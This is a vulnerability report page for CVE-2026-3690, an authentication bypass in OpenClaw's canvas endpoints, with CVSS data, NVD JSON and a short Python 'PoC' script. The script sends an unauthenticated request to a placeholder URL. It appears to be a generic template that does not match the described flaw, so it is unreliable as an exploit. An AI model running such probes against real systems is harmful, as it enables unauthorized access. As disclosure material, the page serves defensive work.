Security Vulnerability Report
中文
CVE-2026-3690 CVSS 7.4 HIGH

CVE-2026-3690

Published: 2026-04-11 01:16:16
Last Modified: 2026-04-27 17:09:56
Source: [email protected]

Description

OpenClaw Canvas Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of OpenClaw. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the the authentication function for canvas endpoints. The issue results from improper implementation of authentication. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-29311.

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw (具体受影响版本请参考官方安全公告GHSA-vvjh-f6p9-5vcf)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-3690 PoC: OpenClaw Canvas Authentication Bypass # Target configuration target_url = "http://target-ip:port/canvas/api/endpoint" def exploit(): headers = { "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-3690-Scanner)", "Content-Type": "application/json" } print(f"[*] Attempting to bypass authentication on {target_url}...") try: # Sending request without authentication cookies/tokens response = requests.get(target_url, headers=headers, timeout=10) # Check if the request was successful (HTTP 200 OK) if response.status_code == 200: print("[+] Authentication bypass successful!") print(f"[+] Response data: {response.text[:200]}") else: print(f"[-] Failed to bypass. Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error occurred: {e}") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3690", "sourceIdentifier": "[email protected]", "published": "2026-04-11T01:16:15.990", "lastModified": "2026-04-27T17:09:55.803", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw Canvas Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of OpenClaw. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of the the authentication function for canvas endpoints. The issue results from improper implementation of authentication. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-29311."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-291"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.19", "matchCriteriaId": "539A1AE2-E6EC-4FC0-A794-28AA37D76D8E"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vvjh-f6p9-5vcf", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-228/", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.